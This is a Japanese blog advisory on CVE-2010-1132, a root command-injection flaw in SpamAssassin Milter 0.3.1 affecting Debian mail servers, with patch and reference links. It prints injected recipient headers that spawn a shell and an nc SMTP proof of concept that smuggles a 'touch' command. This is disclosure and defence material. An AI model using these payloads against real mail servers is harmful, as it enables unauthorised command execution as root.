日曜日, 3月 28, 2010

Spam Asassin Milterのroot権限実行問題(CVE-2010-1132)

ソフト名とバーション情報:SpamAssassin Milter Plugin 0.3.1
ソースファイル名:spamass-milter.cpp
バグってるfunction名前:mlfi_envrcpt()
問題発見日付:2010年3月20日
CVE登録日:2010年3月27日
説明:
影響されている環境はPostfixとSpamAssassin 0.3.1をサービスされているメールサーバです。バグの説明はメールヘッダでshellコマンド(meta-characterで)を書いているとシステムシステムコマンドを実行する事が出来ます。

サンプルヘッダは下記となります(ボールドの文字をご覧下さい)↓
------ここから------
X-Original-To: "root+:|exec /bin/sh 0&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0&0
2>&0
"@calliope.bitfolk
Received: from hoge (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0&0
2>&0"
>; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: fuga@hoge.com
To: undisclosed-recipients:;
------ここ迄--------

PoC(再現仕方)は下記となります(ncコマンド@postfix spamasassin milterで)
------ここから--------
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
------ここ迄--------

現時点では下記のOSで提供されているSpamAsassinMilterパッケージの影響があります。
SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0

解決方法は二つがあります。
1)コンパイルが好きの方々は直接spamass-milterパッチを再コンパイル下さい。
2)Debianパッケージは下記のURLでパッチされたバーションのダウンロードが出来ます↓
http://www.securityfocus.com/bid/38578/solution

リファレンスURL↓
http://lwn.net/Articles/379087/rss
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1132
http://xforce.iss.net/xforce/xfdb/56732
http://www.securitytracker.com/id?1023691
http://www.securityfocus.com/bid/38578
http://www.exploit-db.com/exploits/11662
http://secunia.com/advisories/38840
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

---
株式会社ケイエルジェイテック
http://www.kljtech.com
スパムモニターセンター

0 件のコメント:

コメントを投稿